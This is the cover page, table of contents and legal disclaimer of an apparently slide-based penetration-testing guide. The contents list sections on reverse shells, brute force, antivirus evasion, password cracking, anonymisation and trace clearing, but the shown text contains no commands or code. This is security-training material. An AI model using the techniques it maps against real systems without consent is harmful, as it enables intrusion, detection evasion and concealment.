The document aims to analyze the main phases of a penetration test starting from the information gathering phase up to having a shell on the target machine. The attacker machine is based on kali distribution.

1. TCP/IP Penetration Test - Exploitation
Page 1 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
Summary:
TCP/IP Penetration Test - Exploitation
Description of the last modification:
Insert description of the last modification here
Issued by: Date
LUIGI CAPUZZELLO 10/05/2022
TCP/IP Penetration Test -
Exploitation

2. TCP/IP Penetration Test
Page 2 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
INDEX
1. LEGAL DISCLAIMER ................................................................................................................................................... 8
2. PENETRATION TEST PATH PHASES DESCRIPTION ...................................................................................................... 9
3. ETH-TCP/IP ATTACK PATH DESCRIPTION..................................................................................................................10
3.1. ATTACK PATH SHORT DESCRIPTION .................................................................................................................................. 12
4. GETTING COMFORTABLE WITH KALI LINUX..............................................................................................................13
4.1. TMUX....................................................................................................................................................................... 13
4.2. EDITOR VI ................................................................................................................................................................... 14
4.3. HOW TO INSTALL UPDATE A PROGRAM. ......................................................................................................................... 15
4.4. FIRST ACCESS TO KALI ................................................................................................................................................... 16
5. MANAGING KALI LINUX SERVICES............................................................................................................................18
5.1. SSH SERVICE............................................................................................................................................................... 18
How to activate SSH Server ............................................................................................................................. 18
Useful command.............................................................................................................................................. 19
5.2. HTTP SERVICE............................................................................................................................................................. 20
5.3. FTP SERVICE ............................................................................................................................................................... 20
5.4. TFTPD SERVICE........................................................................................................................................................... 21
5.5. SAMBA SERVICE......................................................................................................................................................... 21
5.6. VNC SERVICE.............................................................................................................................................................. 22
6. BASH: USEFUL COMMAND.......................................................................................................................................22
6.1. USERFUL COMMAND LIST ............................................................................................................................................... 22
6.2. GREP – AWK - SED.................................................................................................................................................... 25
6.3. COMM: FILE COMPARISON ........................................................................................................................................... 26
7. INFORMATION GATHERING.....................................................................................................................................26
7.1. INTERNAL NETWORK SCAN.............................................................................................................................................. 27
7.2. TARGET INFOS ............................................................................................................................................................. 27
7.3. OSSINT..................................................................................................................................................................... 28
7.4. DNS: DEFINE ATTACK SURFACE ....................................................................................................................................... 28
7.5. INFORMATION GATHERING FROM WEB: SHODAN - CENSYS ................................................................................................... 30
7.6. MALTEGO................................................................................................................................................................... 30
7.7. FACEBOOK .................................................................................................................................................................. 30
8. SERVICE INFORMATION GATHERING .......................................................................................................................32
8.1. NMAP........................................................................................................................................................................ 32
9. EXPLOITATION .........................................................................................................................................................34
9.1. EXPLOITATION WITH AUTOMATED TOOLS .......................................................................................................................... 34
nmap ............................................................................................................................................................... 34
Sites ................................................................................................................................................................. 35
Nessus.............................................................................................................................................................. 35
openVAS .......................................................................................................................................................... 36
Metasploit ....................................................................................................................................................... 38
Searchsploit / Metasploit: Vulnerabilità note ................................................................................................. 39
Metasploit: verifica exploit non funzionanti.................................................................................................... 39
Meterpreter..................................................................................................................................................... 39
Armitage: Metasploit Interface....................................................................................................................... 41
Nessus e Metasploit ...................................................................................................................................... 44

3. TCP/IP Penetration Test
Page 3 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
How to compile an exploit manually............................................................................................................. 45
9.2. [21] - FTP.................................................................................................................................................................. 46
Service Fingerprint........................................................................................................................................... 46
AuthN bypass: Anonymous Access .................................................................................................................. 46
AuthN bypass: Bruteforce................................................................................................................................ 46
Information Exposure ...................................................................................................................................... 46
Reverse Shell Activation .................................................................................................................................. 47
DOS.................................................................................................................................................................. 47
9.4. [22, 80, 445] - GIT..................................................................................................................................................... 48
AuthN bypass: Known Vuln ............................................................................................................................. 48
Information Exposure ...................................................................................................................................... 48
9.5. [22] - SSH ................................................................................................................................................................. 50
Service Fingerprint........................................................................................................................................... 50
AuthN Bypass: Connect through found key..................................................................................................... 50
AuthN bypass: Bruteforce................................................................................................................................ 50
AuthN bypass: Known Vuln ............................................................................................................................. 50
9.6. [22, 80, 443, 3690] - SVN.......................................................................................................................................... 52
AuthN bypass: Known Vuln ............................................................................................................................. 52
9.7. [23] - TELNET.............................................................................................................................................................. 52
AuthN bypass: Bruteforce................................................................................................................................ 52
9.8. [25] - SMTP .............................................................................................................................................................. 52
Service Fingerprint........................................................................................................................................... 52
AuthN bypass: Bruteforce................................................................................................................................ 52
Information Exposure ...................................................................................................................................... 53
Reverse Shell Activation .................................................................................................................................. 53
9.9. [50, 51, 500(UDP)] - IPSEC E VPN ................................................................................................................................ 54
AuthN bypass: Bruteforce................................................................................................................................ 54
9.10. [53] - DNS............................................................................................................................................................... 55
Service Fingerprint......................................................................................................................................... 55
Information Exposure.................................................................................................................................... 55
9.11. [69] – TFTP............................................................................................................................................................. 55
Service Fingerprint......................................................................................................................................... 55
9.12. [79] - FINGER............................................................................................................................................................ 56
Information Exposure.................................................................................................................................... 56
9.13. [80] - HTTP ............................................................................................................................................................. 56
9.14. [88] - KERBEROS........................................................................................................................................................ 57
Information Exposure.................................................................................................................................... 57
9.15. [110] – POP3.......................................................................................................................................................... 57
9.16. [111, 2049] – NFS / RPC ......................................................................................................................................... 58
Information Exposure.................................................................................................................................... 58
9.17. [123] - NTP............................................................................................................................................................. 59
Information Exposure.................................................................................................................................... 59
9.18. [143 / 993]: IMAP................................................................................................................................................... 59
Information Exposure.................................................................................................................................... 59
9.19. [161] - SNMP.......................................................................................................................................................... 60
Service Fingerprint......................................................................................................................................... 60
AuthN bypass: Bruteforce.............................................................................................................................. 60
Information Exposure.................................................................................................................................... 60
9.20. [389] AD................................................................................................................................................................. 61
Information Exposure.................................................................................................................................... 61
9.21. [389] LDAP............................................................................................................................................................. 62
Information Exposure.................................................................................................................................... 63
9.22. [443] - HTTPS ......................................................................................................................................................... 65
9.23. [443, 8443] - OPENVPN............................................................................................................................................ 66
AuthN bypass: Bruteforce.............................................................................................................................. 66

4. TCP/IP Penetration Test
Page 4 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
9.24. [445] - SMB ............................................................................................................................................................ 67
Service Fingerprint......................................................................................................................................... 67
AuthN bypass: Bruteforce.............................................................................................................................. 67
Information Exposure.................................................................................................................................... 67
Reverse Shell Activation ................................................................................................................................ 75
9.25. [1433] - MSSQL...................................................................................................................................................... 78
Service Fingerprint......................................................................................................................................... 78
authN bypass: bruteforce.............................................................................................................................. 78
Information Exposure.................................................................................................................................... 78
Reverse Shell Activation ................................................................................................................................ 79
9.26. [1521] - ORACLE..................................................................................................................................................... 80
Information Exposure: msfconsole ................................................................................................................ 80
Information Exposure: ODAT......................................................................................................................... 80
Reverse Shell Activation ................................................................................................................................ 83
9.27. [3128] - SQUID ......................................................................................................................................................... 87
Reverse Shell Activation ................................................................................................................................ 87
9.28. [3260] - ISCSI.......................................................................................................................................................... 88
Information Exposure.................................................................................................................................... 88
9.29. [3306] – MYSQL / MARIADB..................................................................................................................................... 89
Service Fingerprint......................................................................................................................................... 89
AuthN bypass: Anonymous Access ................................................................................................................ 89
AuthN bypass: Bruteforce.............................................................................................................................. 89
Information Exposure.................................................................................................................................... 89
Reverse Shell Activation: con searchexploit .................................................................................................. 90
Reverse Shell Activation: con UDF exploitation............................................................................................. 90
9.30. [3389] - RDP........................................................................................................................................................... 92
Service Fingerprint......................................................................................................................................... 92
AuthN bypass: Bruteforce.............................................................................................................................. 92
9.31. [5900] - VNC........................................................................................................................................................... 93
Service Fingerprint......................................................................................................................................... 93
AuthN bypass: Bruteforce.............................................................................................................................. 93
9.32. [5985] – WINRM ..................................................................................................................................................... 93
Reverse Shell Activation ................................................................................................................................ 93
9.33. [6379]: REDIS......................................................................................................................................................... 94
Information Exposure.................................................................................................................................... 94
Reverse Shell Activation ................................................................................................................................ 94
PostExploitation: write file (SSH / HTTP / CRONTAB) .................................................................................... 95
9.34. [8000] JDWP: JAVA DEBUGGING PORT ........................................................................................................................ 97
Reverse Shell Activation ................................................................................................................................ 97
9.35. [8000] - AJENTI ........................................................................................................................................................ 97
Reverse Shell Activation ................................................................................................................................ 97
9.36. [8080] TOMCAT ..................................................................................................................................................... 98
Reverse Shell Activation ................................................................................................................................ 98
AuthN bypass ................................................................................................................................................ 98
Reverse Shell Activation ................................................................................................................................ 98
9.37. [9200] - ELASTICSEARCH. ........................................................................................................................................... 99
Service Fingerprint......................................................................................................................................... 99
Information Exposure.................................................................................................................................... 99
9.39. [10000] - WEBMIN.................................................................................................................................................101
Reverse Shell Activation: con meterpreter (possibili crdenziali necessarie) ................................................101
Reverse Shell Activation: manualmente (senza credenziali) .......................................................................102
9.40. [11211] - MEMCACHED............................................................................................................................................102
Information Exposure..................................................................................................................................102
9.41. [27017] - MONGODB .............................................................................................................................................104
Service Fingerprint.......................................................................................................................................104

5. TCP/IP Penetration Test
Page 5 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
AuthN bypass: Bruteforce............................................................................................................................104
Information Exposure..................................................................................................................................104
10. MODULE: CREATE A REVERSE SHELL ....................................................................................................................106
10.1. ![WINDOWS] BY MEANF OF SETOOLKIT .........................................................................................................................106
10.2. MANUALLY..............................................................................................................................................................107
[windows]: reverse shell ..............................................................................................................................107
[windows]: reverse shell ..............................................................................................................................108
[windows]: execute command.....................................................................................................................109
10.3. BY MEANS OF TOOL: NETCAT, SOCAT, NC .......................................................................................................................109
[Windows-Linux] Netcat..............................................................................................................................109
socat............................................................................................................................................................110
NCat.............................................................................................................................................................110
10.4. BY MEANS OF MSFVENOM: EXE, ELF, PHP, ASP, JSP, WAR..................................................................................................110
[Windows]: reverse shell/ bind shell / execute command / embedded execution ......................................110
[Windows] Reverse shell nishang ................................................................................................................111
[Linux]: reverse shell / bind shell .................................................................................................................111
[Linux] PHP: reverse shell ............................................................................................................................112
[Windows] ASP/ASPX: reverse shell.............................................................................................................112
WAR: reverse shell.......................................................................................................................................112
JSP: reverse shell..........................................................................................................................................112
10.5. BY MEANS OF SCRIPTING LANGUAGE: BASH, PERL, PYTHON, PHP, POWERSHELL ....................................................................112
[Linux] bash .................................................................................................................................................113
[Linux] Perl...................................................................................................................................................113
[Linux] python..............................................................................................................................................113
[Linux] PHP ..................................................................................................................................................113
[Windows] Powershell.................................................................................................................................113
10.7. AV EVASION ...........................................................................................................................................................114
![windows] msfvenom -> doubled enc.........................................................................................................114
manually......................................................................................................................................................117
by means of Shellter ....................................................................................................................................119
by means of mimikatz .................................................................................................................................120
11. MODULE SCRIPTING: USEFUL SCRIPT ...................................................................................................................127
11.1. JAVASCRIPT: IMPLEMENT POST ..................................................................................................................................127
11.2. LUA: READ / WRITE FILE............................................................................................................................................127
11.3. LUA: EXECUTE COMMAND.........................................................................................................................................128
11.4. PYTHON: BRUTEFORCE SOCKET TCP/UDP READING DATA FROM A FILE ..............................................................................128
11.5. PYTHON: BRUTEFORCE SOCKET ...................................................................................................................................129
11.6. PYTHON: READ DATA FROM MYSQL..............................................................................................................................129
11.7. PYTHON: TAKE DATA FROM A WEB PAGE, PROCESS IT AND SEND RESULT VIA POST ...............................................................130
11.8. PYTHON: BRUTEFORCE BY MEANS OF ANTI-CSRF ...........................................................................................................131
11.9. PYTHON: BRUTEFORCE SMTP....................................................................................................................................132
11.10. PYTHON: CRACK ENCRYPTED INFO KWOWING ALGORITHM WITH BRUTE FORCE ..................................................................134
11.11. PYTHON: CRACK ENCRYPTED INFO KWOWING ALGORITHM WITH DICTIONARY ...................................................................134
11.12. PYTHON: LFI.........................................................................................................................................................135
11.13. PHP: CRACK SALTED HASH PASSWORD......................................................................................................................136
12. MODULE: BRUTE FORCE.......................................................................................................................................137
13. MODULE: PASSWORD CRACKING.........................................................................................................................137
13.1. TOOLS..................................................................................................................................................................137
hashcat........................................................................................................................................................137
John The Ripper ...........................................................................................................................................137
hydra ...........................................................................................................................................................138

6. TCP/IP Penetration Test
Page 6 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
13.2. DICTIONARY.........................................................................................................................................................139
Ready to use ................................................................................................................................................139
Ready to use with HASH ..............................................................................................................................139
create one with john....................................................................................................................................139
create one manually....................................................................................................................................140
13.3. CRACK PASSWORD ON-LINE.......................................................................................................................................141
online Site....................................................................................................................................................141
13.4. CRACK PASSWORD OFF-LINE......................................................................................................................................141
Python: Crack Salted Hash Password ..........................................................................................................141
.htpasswd ....................................................................................................................................................142
Cisco Password Type 5, 7.............................................................................................................................142
Crack: Mozilla profile .default .....................................................................................................................143
Crack Groups.xml.........................................................................................................................................143
Hash Generici: John .....................................................................................................................................143
Hash Generici: rcrack...................................................................................................................................145
Hash Generici: RAINBOW TABLE .................................................................................................................145
Hash Generici: ophcrack..............................................................................................................................145
Crack Linux password ................................................................................................................................146
Crack: LUKS file..........................................................................................................................................146
JWT firma: hashcat....................................................................................................................................147
.KIRBI (Kerberos Token) .............................................................................................................................147
MD5: hashcat ............................................................................................................................................148
PKI: private key with password .................................................................................................................148
VNC............................................................................................................................................................149
Windows Password Hash Cracking............................................................................................................153
Windows Password: john ..........................................................................................................................162
Windows: .dit e .bin...................................................................................................................................163
WPA/WPA2: hashcat.................................................................................................................................164
WPA/WPA2: pyrit......................................................................................................................................164
WPA/WPA2: aircrack / john ......................................................................................................................165
ZIP..............................................................................................................................................................166
14. IPV6 .....................................................................................................................................................................166
14.1. NOTATIONS.............................................................................................................................................................166
14.2. TYPES OF ADDRESSING ..............................................................................................................................................166
14.3. SPECIAL ADDESSING..................................................................................................................................................169
14.4. IPV6: ATTACK MANUALLY..........................................................................................................................................169
80: http....................................................................................................................................................................170
14.5. IPV6: ATTACK WITH ALIVE6 .......................................................................................................................................170
14.6. LOOKING AROUND ...................................................................................................................................................171
14.7. SETTING A GLOBAL ADDRESS ......................................................................................................................................171
14.8. IPV6 AND METASPLOIT .............................................................................................................................................172
14.9. SETTINGS AN IPV6 TUNNEL........................................................................................................................................175
15. APPENDIX: BECOME SILENT. ................................................................................................................................177
15.1. IPTABLES.................................................................................................................................................................177
15.2. TORTUNNEL - PROXYCHAINS........................................................................................................................................177
15.3. PROXYCHAIN...........................................................................................................................................................178
15.4. TOR......................................................................................................................................................................178
16. APPENDIX: CLEAN TRACES. ..................................................................................................................................180
17. APPENDIX: BASH SCRIPTING ................................................................................................................................180
17.1. VARIABLE................................................................................................................................................................180
17.2. FUNCTION ARGOMENT ..............................................................................................................................................180

7. TCP/IP Penetration Test
Page 7 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
17.3. READ USER INPUT.....................................................................................................................................................180
17.4. IF / ELSE STATEMENT...............................................................................................................................................181
17.5. CICLO FOR .............................................................................................................................................................181
17.6. CICLO WHILE..........................................................................................................................................................182
17.7. FUNCTION ...........................................................................................................................................................182
18. APPENDIX: DOCKER .............................................................................................................................................183

8. TCP/IP Penetration Test
Page 8 / 184
Linkedin: https://www.linkedin.com/in/luigi-capuzzello/
Slideshare: http://www.slideshare.net/luigicapuzzello
Twitter: @FisherKasparov
Skype: luigi.capuzzello
1. LEGAL DISCLAIMER
Usage of this document for attacking targets without prior mutual consent is
illegal. It is the end user's responsibility to obey all applicable local, state
and federal laws. Author assume no liability and are not responsible for any
misuse or damage caused by this docuemnt.